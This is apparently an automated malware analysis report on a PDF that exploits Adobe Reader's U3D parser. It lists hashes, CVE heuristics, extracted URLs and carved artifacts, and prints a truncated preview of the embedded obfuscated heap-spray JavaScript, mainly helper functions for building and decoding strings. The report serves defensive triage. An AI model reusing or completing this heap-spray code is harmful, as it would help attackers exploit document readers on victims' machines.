Malicious PDF — malware analysis report

Static analysis result for SHA-256 81ca434cab270376…

Verdict: MALICIOUS
File type: PDF
Size: 320.0 KB
Created: 2008-01-05 16:25:50 +01:00
Authoring application: LaTeX with hyperref package (via pdfeTeX-1.21a)
First seen: 2026-05-08
MD5: 2ed62eefc1fc5041c6d4f09a86db4e85
SHA-1: b236e0012114e0dd2ca0358265a634025d397dd4
SHA-256: 81ca434cab2703769e7a5e04f75701db9e00f2c6ec23aaa96ae3060d8008435b
Risk Score: 212

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

This PDF file contains embedded JavaScript and U3D content, triggering critical heuristics related to Adobe Reader U3D parser exploits (CVE-2011-2462 and CVE-2009-3459). The JavaScript appears to be a heap spray designed to facilitate the exploitation of these vulnerabilities. The primary goal is likely to achieve arbitrary code execution for downloading and running a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9868

Heuristics (8)

  • Adobe Reader U3D parser exploit with JavaScript heap spray | critical | CVE likely | CVE_2011_2462_U3D_HEAPSPRAY
    PDF combines U3D/3D annotation content with JavaScript heap-spray shellcode. Public CVE-2011-2462 exploit chains use a crafted U3D stream and JavaScript heap spray to control memory during Adobe Reader's U3D parser corruption.
  • Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 | critical | CVE likely | CVE_2009_2990_U3D_AUTOACTIVATE
    PDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-2990 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
  • U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator | high | CVE related | PDF_U3D_CVE_RELATED
    PDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
  • JavaScript action | low | 1 related finding | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • External URI | info | PDF_URI
    PDF contains an external URL action.
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL | Channel
    • http://vcg.isti.cnr.it)/S/URI/Type/Action | In PDF document text
    • http://meshlab.sourceforge.net)/S/URI/Type/Action | In PDF document text
    • http://vcg.isti.cnr.it | PDF link annotation
    • http://meshlab.sourceforge.net | In PDF document text
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# | In PDF document text
    • http://ns.adobe.com/xap/1.0/ | In PDF document text
    • http://purl.org/dc/elements/1.1/ | In PDF document text
    • http://ns.adobe.com/pdf/1.3/ | In PDF document text
    • http://ns.adobe.com/pdfx/1.3/ | In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/ | In PDF document text

Extracted artifacts (6)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0015_000.js | pdf-javascript-stream | PDF /JS object 15 at offset 0x665 | 5452 bytes
SHA-256: 1f14163b18a0dd9c1620895d8541a53dd197273f7999faee5066fadc473eb3bd
Preview script
First 1,000 lines of the extracted script
var unes=unescape;
function StringBuffer()
{
    this._strings = [];
    if(arguments.length==1)
    {
        this._strings.push(arguments[0]);
    }
}

StringBuffer.prototype.append = function(str)
{
    this._strings.push(str);
    return this;
}

StringBuffer.prototype.toString = function()
{
    return this._strings.join("");
}

StringBuffer.prototype.length = function()
{
    var str = this._strings.join("");
    return str.length;
}
function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret='';
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret += util["\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf.substr(x,2)));//
          }
          return ret;
}
... (truncated)
stream_009_off00024ab2.bin | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x24AB2 | 177792 bytes
SHA-256: b1f937b9541d599e1c6000c4c47f7f3f21a4d9b0e1051c8a5580e07bc6106afd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.72, consistent with packed or encrypted content.
font_00_type1_off0001deff.bin | pdf-font-stream | PDF embedded font (type1) at offset 0x1DEFF | 6428 bytes
SHA-256: d129a586d7449f3004ab2629e1b01753002037f8ca955d68339aba6fea13d9dd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
font_01_type1_off0001f79a.bin | pdf-font-stream | PDF embedded font (type1) at offset 0x1F79A | 7849 bytes
SHA-256: 6d68a200ddadd677e7031f9795a017ce42b4d7f02b68d39a072ecbc1e20fb5d6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.64, consistent with packed or encrypted content.
font_02_type1_off00021666.bin | pdf-font-stream | PDF embedded font (type1) at offset 0x21666 | 2374 bytes
SHA-256: cab7a46a0f2b73639fc37aa221b515da6888b096748ee89dec2f4876e25f7f1f
font_03_type1_off00021e57.bin | pdf-font-stream | PDF embedded font (type1) at offset 0x21E57 | 11287 bytes
SHA-256: f1d06dc0327817e03d778a88f65436557134c269106fbc5438dd4ef0c897a441
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.76, consistent with packed or encrypted content.